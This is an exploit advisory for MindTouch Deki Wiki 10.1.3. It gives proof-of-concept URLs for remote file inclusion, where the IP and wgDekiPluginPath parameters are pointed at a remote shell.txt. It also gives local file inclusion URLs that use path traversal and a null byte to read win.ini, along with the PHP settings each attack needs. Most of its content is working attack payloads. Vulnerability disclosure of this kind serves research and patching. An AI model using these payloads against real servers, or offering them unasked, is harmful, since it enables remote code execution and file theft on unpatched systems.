MindTouch Deki Wiki version 10.1.3 suffers from local file inclusion and remote file inclusion vulnerabilities.
1f4ca7a634bd64462aadf58174a71b966947d403044fd5518e0962fbeee6c17a
####################################################
### Exploit Title: MindTouch Deki Wiki v10.1.3 Multiple Vulnerabilities
### Date: 11/08/2012
### Author: L0n3ly-H34rT
### Homepage: http://se3c.tk/
### Contact: l0n3ly_h34rt@hotmail.com
### Software Link: http://garr.dl.sourceforge.net/project/dekiwiki/MindTouch%20Core%20Source/Pipestone%2010.1.3/MindTouch_Core_10.1.3_Source.tar.gz
### Tested on: Linux/Windows
### Version : 10.1.3 ( I don't check old version & may be affected ! )
####################################################
# Multiple Remote File Inclusion :
1- File ( deki/gui/link.php ) in lines 27 & 28 :
require_once($IP . '/includes/Defines.php');
require_once($IP . '/includes/Setup.php');
- P.O.C :
http://127.0.0.1/deki/web/deki/gui/link.php?IP=http://127.0.0.1/shell.txt?
2- File ( deki/plugins/deki_plugin.php ) in lines 486 , 487 & 488 :
require_once($IP . $wgDekiPluginPath . '/' . 'deki_plugin_view.php');
require_once($IP . $wgDekiPluginPath . '/' . 'special_page_plugin.php');
require_once($IP . $wgDekiPluginPath . '/' . 'special_mvc_plugin.php');
- P.O.C :
http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?IP=http://127.0.0.1/shell.txt?
http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://127.0.0.1/shell.txt?
-----------------------------------------------------------------------------
# Multiple Local File Inclusion :
- P.O.C :
http://127.0.0.1/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00
http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00
http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00
# Notes :
- For Remote File Inclusion Must Be allow_url_include=On
- For Local File Inclusion Must Be magic_quotes_gpc = Off
# Greetz to my friendz